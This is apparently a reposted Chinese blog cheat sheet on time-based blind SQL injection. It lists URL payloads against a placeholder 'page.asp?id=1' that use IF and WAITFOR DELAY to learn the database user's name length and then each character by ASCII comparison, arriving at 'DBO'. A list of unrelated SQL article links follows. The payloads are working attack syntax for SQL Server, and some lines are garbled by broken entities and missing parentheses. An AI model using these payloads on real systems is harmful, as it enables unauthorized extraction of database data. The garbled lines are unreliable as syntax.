SQL_BlindInjection[Example]

简介:
####################################################***nbsp; 
Blind SQL Injection Syntax for extracting the USER  
>  
Total Characters  
http://***91;site***93;/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--  
http://***91;site***93;/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--  
http://***91;site***93;/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--  
> (+10 seconds)  
>  
1st Character  
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97)  
WAITFOR DELAY '00:00:10'-- (+10 seconds)  
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98)  
WAITFOR DELAY '00:00:10'--  
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99)  
WAITFOR DELAY '00:00:10'--  
http://***91;site***93;/page.asp?id=1; IF  
> (ASCII(lower(substring((USER),1,1)))=100WAITFOR DELAY '00:00:10'--  
> (+
10 seconds)  
>  
2nd Character  
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97)  
WAITFOR DELAY '00:00:10'-- (+10 seconds)  
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98)  
WAITFOR DELAY '00:00:10'-- (+10 seconds)  
>  
3rd Character  
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97)  
WAITFOR DELAY '00:00:10'-- (+10 seconds)  
http://***91;site***93;/page.asp?id=1; IF  
> (ASCII(lower(substring((USER),3,1)))>115WAITFOR DELAY '00:00:10'--  
http://***91;site***93;/page.asp?id=1; IF  
> (ASCII(lower(substring((USER),3,1)))>105WAITFOR DELAY '00:00:10'--  
> (+
10 seconds)  
http://***91;site***93;/page.asp?id=1; IF  
> (ASCII(lower(substring((USER),3,1)))>110WAITFOR DELAY '00:00:10'--  
> (+
10 seconds)  
http://***91;site***93;/page.asp?id=1; IF  
> (ASCII(lower(substring((USER),3,1)))=109WAITFOR DELAY '00:00:10'--  
http://***91;site***93;/page.asp?id=1; IF  
> (ASCII(lower(substring((USER),3,1)))=110WAITFOR DELAY '00:00:10'--  
> (+
10 seconds)  
>  
Database User DBO  
>  
>  
>  

***91;/LEFT***93; 


本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/479423,如需转载请自行联系原作者

相关文章
|
7月前
|
SQL HIVE
每天一道大厂SQL题
每天一道大厂SQL题
64 1
每天一道大厂SQL题
|
7月前
|
SQL 存储 关系型数据库
什么是SQL?
什么是SQL?
79 0
|
7月前
|
SQL 存储 数据管理
SQL
SQL
45 0
|
4月前
|
SQL 数据库 开发者
SQL中为什么不要使用1=1?
【8月更文挑战第11天】在SQL查询语句中,偶尔会遇到使用1=1作为WHERE子句一部分的情况,这种做法看似无害,实则隐藏着一些潜在的问题和更好的替代方案。本文将深入探讨为什么不建议在SQL中使用1=1,并分享更优化的查询构建策略。
105 2
|
SQL NoSQL
SQL 更新视图
SQL 更新视图
120 2
|
SQL 数据挖掘 Python
sql8&10&11&12,3+1
sql8&10&11&12,3+1
116 0
sql8&10&11&12,3+1
|
SQL 存储 缓存
或许你不知道的12条SQL技巧
或许你不知道的12条SQL技巧
|
存储 SQL NoSQL
SQL必知必会(一)
对于我们而言,数据库是一个以某种有组织的方式存储的数据集合。最简单的办法就是将数据库想象成一个文件柜。这个文件柜是一个存放数据的物理位置,不管数据是什么,也不管数据是如何组织的。 数据库(DataBase) 保存有组织数据的容器(通常为一个或一组文件)